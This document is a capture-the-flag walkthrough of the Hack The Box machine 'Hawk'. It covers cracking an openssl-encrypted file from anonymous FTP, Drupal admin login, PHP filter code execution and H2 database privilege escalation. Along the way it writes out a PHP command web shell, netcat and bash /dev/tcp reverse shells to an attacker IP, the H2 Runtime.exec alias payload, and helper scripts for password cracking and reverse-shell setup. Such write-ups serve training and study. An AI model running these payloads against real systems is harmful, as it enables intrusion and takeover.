Linux Boxes

hawk

  1. nmapAuto
    1. vuln scan
    2. udp scan
    3. recon
  2. http:80, 8082 & 9092
  3. ftp
    1. drupal.txt.enc
    2. bruteforce-salted-openssl
    3. drupal.txt.enc contents
  4. initial foothold
    1. drupal login
      1. droopescan
        1. enable php module
        2. php reverse shell
        3. php system RCE
  5. priv esc
    1. LinEnum.sh
    2. easy way (45506.py)
    3. ippsec way
      1. find reused password in /var/www/html settings.php file
      2. ssh to port 8082 locally with daniel user
      3. H2 exploit
        1. logging in with arbitrary database name
        2. RCE
        3. rev shell
  6. user/root
  7. lessons learned

hawk

images/1486-1.png
images/1486-2.png

nmapAuto

images/1502-1.png


images/1502-2.png


images/1502-3.png

vuln scan

images/1516-1.png

udp scan

SNMP is running on the box. We'll keep that in mind, but it is SNMPv3, so the usual community-string walk (public/private) returns nothing without valid credentials.

moving on for now
images/1520-1.png

recon

gobuster and nikto scans were noisy and uninformative, but droopescan (a Drupal-aware scanner) turned up potentially interesting information about the box

images/1521-1.png

http:80, 8082 & 9092

Drupal web server on port 80

images/1515-1.png

the service on port 8082 answers but refuses remote connections; once we have a foothold on the box we can reach it through an ssh local port forward
images/1515-2.png


port 9092 is the default TCP listener of the H2 database, which we will come back to during priv esc; moving on for now
images/1515-3.png

ftp

images/1519-1.png

the box has an ftp server that allows anonymous login, let's check that out

images/1519-2.png

moving into the messages directory we see no files listed, but let's check for hidden files with ls -la
images/1519-3.png

we see there's a drupal.txt.enc (a dotfile, hence invisible to plain ls), let's download it with get
images/1519-4.png

drupal.txt.enc

let's first grab the file with get
images/1523-1.png

looking at the file, we see it is openssl-encrypted (the "Salted__" magic that openssl enc -salt writes) and then base64-encoded, so let's take it one step at a time and decode it from base64 first
images/1523-2.png

images/1523-3.png


and here's our decoded file; now let's decrypt it
images/1523-4.png
images/1523-4.png

bruteforce-salted-openssl

IppSec points us to the bruteforce-salted-openssl tool to crack the passphrase of this file

a quick apt search also shows it's in the rolling kali packages
images/1524-1.png
images/1524-2.png

trying the default parameters, the tool fails,
images/1524-3.png

but if we change the key-derivation digest from the tool's default md5 to sha256 (OpenSSL 1.1.0 and later derive the key with sha256 by default, so a file encrypted with a modern openssl will never open with md5)....


bruteforce-salted-openssl -f /usr/share/wordlists/rockyou.txt -d sha256 drupal.txt.enc.decoded

(the cipher defaults to aes-256-cbc, the encrypted file is the positional argument, and rockyou lives under /usr/share/wordlists on Kali)

images/1524-4.png

the tool finds the password: friends

dropal.txt.enc contents

now that we have the passphrase, let's decrypt the contents (on an openssl older than 1.1.0 add -md sha256 explicitly, for the same reason as above)

openssl aes-256-cbc -d -in drupal.txt.enc.decoded -out drupal.txt
images/1526-1.png

portal password is PencilKeyboardScanner123
images/1526-2.png
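The decode, digest choice and decrypt steps above, as an added shell example that is not part of the original writeup: it builds its own openssl-encrypted, base64-wrapped file locally (constructed plaintext, constructed passphrase "friends", a constructed five-word list standing in for rockyou.txt) and then brute-forces it with nothing but openssl, so the effect of the KDF digest can be seen directly.

```shell
#!/bin/sh
# Added example, not from the original writeup. Everything below is
# constructed locally: the plaintext, the passphrase and the tiny wordlist.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
PLAIN="$WORK/drupal.txt"
ENC="$WORK/drupal.txt.enc"
WORDLIST="$WORK/words.txt"

# Constructed stand-in for the box's file: aes-256-cbc, salted, key derived
# from the passphrase with sha256 (the OpenSSL >= 1.1.0 default), then base64.
printf 'Daniel,\nthe portal password is Example123\n' > "$PLAIN"
openssl enc -aes-256-cbc -salt -md sha256 -pass pass:friends \
    -in "$PLAIN" 2>/dev/null | base64 > "$ENC"

# Constructed mini wordlist; rockyou.txt plays this role on the real box.
printf 'password\n123456\nletmein\nfriends\nqwerty\n' > "$WORDLIST"

# Step 1 check: after stripping the base64 layer, an openssl enc file
# starts with the 8-byte magic "Salted__" (followed by the 8-byte salt).
is_openssl_salted() {
    [ "$(base64 -d "$1" 2>/dev/null | head -c 8)" = "Salted__" ]
}

# Steps 2 and 3: try each candidate passphrase with the given KDF digest.
# A wrong key almost always fails the CBC padding check (openssl exits 1);
# the printable-text test rejects the rare case where garbage padding
# happens to validate, which is the job bruteforce-salted-openssl's magic
# string option does.
crack_openssl_file() {
    encfile=$1; wordlist=$2; digest=$3
    raw="$WORK/raw.bin"
    base64 -d "$encfile" > "$raw"
    while IFS= read -r cand; do
        if out=$(openssl enc -d -aes-256-cbc -md "$digest" -pass "pass:$cand" \
                    -in "$raw" 2>/dev/null) \
           && [ -n "$out" ] \
           && ! printf '%s' "$out" | LC_ALL=C grep -q '[^[:print:][:space:]]'
        then
            printf '%s\n' "$cand"
            return 0
        fi
    done < "$wordlist"
    return 1
}

is_openssl_salted "$ENC" && echo "Salted__ header present after base64 decode"
echo "md5 digest:    $(crack_openssl_file "$ENC" "$WORDLIST" md5 || echo 'no password found')"
echo "sha256 digest: $(crack_openssl_file "$ENC" "$WORDLIST" sha256 || echo 'no password found')"
```

The md5 pass finds nothing even though the right word is in the list, which is exactly the failure seen with the tool's defaults; the sha256 pass returns friends. On a real engagement swap the constructed wordlist for rockyou.txt and expect it to be slow: each candidate costs a key derivation plus a decryption of the whole file.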

initial foothold

drupal admin access
php filter enabling
reverse shell

drupal login

entering PencilKeyboardScanner123 on the login form
images/1527-1.png


logs us in as admin! let's enumerate drupal a bit now with droopescan
images/1527-2.png

droopescan

droopescan is available on github

this Drupal instance has the PHP filter module available! since we have admin access to the portal, we can enable it and execute arbitrary PHP from an article body, either a reverse shell or a small command-execution stub
images/1525-1.png

enable php module

before we can add php code, we have to enable the PHP filter module on the site's Modules page
images/1530-1.png

images/1530-2.png
images/1530-3.png

images/1530-4.png

now when writing articles, the Text format dropdown offers PHP code, and PHP in the body is executed when the node is rendered
images/1530-5.png

php reverse shell

first copy pentestmonkey's php-reverse-shell into our working directory and set the IP and port to our listener

images/1528-1.png

copy and paste the code into the article body, select the PHP code text format and hit “preview”
images/1528-2.png


simply previewing the page while a netcat listener is waiting executes the PHP and hands us a reverse shell!
images/1528-3.png

upgrade to a proper tty with python3 (pty.spawn)
images/1528-4.png

then background the shell, run stty raw -echo on the attacker side, and fg to get tab completion and job control

images/1528-5.png

php system RCE

we can post the full php reverse shell, or we can post a one-line php stub that hands a URL parameter to system() and gives us RCE on demand

<?php system($_GET['cmd']); ?>
images/1529-1.png

images/1529-2.png

images/1529-3.png

after saving we are redirected to the page we created
images/1529-4.png

and we can append ?cmd=<command> to its URL to execute commands, like the following:

images/1529-5.png

images/1529-6.png


let's execute a reverse shell from pentestmonkey's cheat sheet. The netcat variant only works if the box's nc supports -e:

nc -e /bin/bash 10.10.14.62 4444

the bash-only variant needs nothing but bash. Either way the command must be URL-encoded before it goes into the query string (in Burp, select it and press Ctrl+U), because a raw & would end the cmd parameter and spaces must become +:

bash+-c+'bash+>%26+/dev/tcp/10.10.14.62/4444+0>%261'
images/1529-7.png


images/1529-8.png

images/1529-9.png

priv esc

LinEnum finds an H2 database service running as root

easy way (public exploit) and IppSec's way (manual)

LinEnum.sh

we all know the drill by now: serve LinEnum.sh from an http server on our machine and fetch it on the victim with wget

images/1536-1.png

images/1536-2.png

images/1536-3.png

The H2 database is run with root privileges. Let’s check access to the /opt/h2 directory.
images/1536-4.png

easy way (45506.py)

searchsploit H2
images/1535-1.png
images/1535-2.png

an RCE, and the H2 process is already running as root, so let's take a closer look at 45506.py

images/1535-3.png

lets give it a shot

first mirror it over to our directory
searchsploit -m java/webapps/45506.py
images/1535-4.png


serve it from our http server and fetch it on the victim
images/1535-5.png

wget 10.10.14.62:5555/45506.py
images/1535-6.png

and run it against H2's web console on port 8082
images/1535-7.png

win
images/1535-8.png




ippsec way

going into the /var/www/html directory

find resused password in /var/www/html settings.php file

we can use grep in /var/www/html to search recursively for "password" strings

grep -R password
images/1541-1.png

we see the $databases array in settings.php holds the password drupal4hawk, let's see if the password is reused

the decrypted drupal.txt was addressed to Daniel, so let's try daniel with drupal4hawk

we're in!
images/1541-2.png


NOTE: the login drops us into a Python interpreter rather than bash, so we spawn a shell with the os module (os.system)

images/1541-3.png
images/1541-4.png

images/1541-5.png
images/1541-6.png

ssh to port 8082 locally with daniel user

recalling that port 8082 refused remote connections earlier....
images/1542-1.png
images/1542-2.png
we can use an ssh local port forward as daniel to reach port 8082 on the victim's loopback

ssh -L 9003:127.0.0.1:8082 daniel@10.10.10.102
images/1542-3.png

since our local port 9003 (cause it's over 9000) now forwards to 127.0.0.1:8082 on the victim, the H2 console sees the connection as local and we can browse to it at http://localhost:9003
images/1542-4.png

images/1542-5.png

H2 exploit

IppSec refers us to this article (found via Google):

images/1543-1.png

according to the article, the console accepts a login with an arbitrary, non-existent database name (H2 simply creates it with the credentials we supply), and once inside we can define a Java alias that executes OS commands:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('id')

images/1543-2.png

logging in with arbitrary database name

images/1544-1.png

images/1544-2.png

RCE

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('id')


the output of id shows root at the bottom of the screen (the alias body is Java source, so its capitalisation must be kept exact); all we need to do now is call a shell back to our attack machine as root
images/1545-1.png

rev shell

images/1546-1.png
Runtime.exec() splits the command on whitespace and runs it without a shell, so redirections like >& can't go inline; instead create a /tmp/exec.sh holding the bash reverse shell, chmod +x it, and run it via H2

images/1546-2.png
images/1546-3.png


CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('/tmp/exec.sh')


images/1546-4.png

images/1546-5.png
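The alias-plus-wrapper-script approach above, as an added shell example that is not part of the original writeup: it writes the exec.sh wrapper and emits the H2 statements that run it, with the SQL quoting handled so a command containing a single quote does not break the CALL. The listener address is the writeup's; the script is written into a temporary directory here instead of /tmp, which is an assumption about where the box lets you write.

```shell
#!/bin/sh
# Added example, not from the original writeup. It prepares the two pieces
# used above: the exec.sh wrapper and the SQL that makes H2 execute it.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# H2 string literals are single-quoted; a quote inside the command must be
# doubled or the CALL statement breaks.
sql_quote() {
    printf '%s' "$1" | sed "s/'/''/g"
}

# The alias body is Java, hence case-sensitive (String, IOException, "\\A").
# Runtime.exec(String) tokenises on whitespace and starts the program
# directly, with no shell, so "bash >& /dev/tcp/..." inline would hand the
# redirection tokens to bash as literal arguments. Define the alias once.
h2_shellexec_alias_sql() {
    cat <<'EOF'
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
EOF
}

# One CALL per command; only stdout comes back through getInputStream(),
# so stderr from the command is invisible in the console.
h2_call_sql() {
    printf "CALL SHELLEXEC('%s');\n" "$(sql_quote "$1")"
}

# The wrapper: a real bash process interprets the redirections, which is
# what Runtime.exec() cannot do for us.
write_exec_sh() {
    path=$1; lhost=$2; lport=$3
    printf '#!/bin/bash\nbash >& /dev/tcp/%s/%s 0>&1\n' "$lhost" "$lport" > "$path"
    chmod +x "$path"
}

EXEC_SH="$WORK/exec.sh"      # on the box this was /tmp/exec.sh
write_exec_sh "$EXEC_SH" 10.10.14.62 4444

echo "--- paste into the H2 console, in order ---"
h2_shellexec_alias_sql
h2_call_sql 'id'             # sanity check first: output should show uid=0(root)
h2_call_sql "$EXEC_SH"       # then fire the reverse shell
```

Test with a command that prints something (id, whoami) before calling the wrapper: the wrapper itself produces no stdout, so a failed reverse shell looks the same in the console as a successful one, and only the netcat listener tells you which it was.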

user/root

images/1537-1.png
d5111d4f75370ebd01cdba5b32e202a8

images/1537-2.png
54f3e840fe5564b42a8320fd2b608ba0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1547-1.png